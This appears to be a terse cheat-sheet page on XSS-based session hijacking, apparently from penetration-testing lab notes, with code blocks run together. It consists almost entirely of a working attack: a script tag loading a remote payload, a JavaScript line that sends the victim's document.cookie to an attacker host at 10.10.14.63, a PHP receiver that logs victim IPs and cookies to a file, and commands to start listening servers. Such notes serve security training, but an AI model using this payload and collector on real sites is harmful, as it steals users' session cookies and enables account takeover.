XSS-based Session Hijacking
<script src="http://10.10.14.63/script.js"></script>new Image().src='http://10.10.14.63/index.php?c='+document.cookie;<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $cookie) {
$cookie = urldecode($cookie);
file_put_contents("cookies.txt", "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n", FILE_APPEND);
}
}
?>php -S 0.0.0.0:80php -S 0.0.0.0:8080Last updated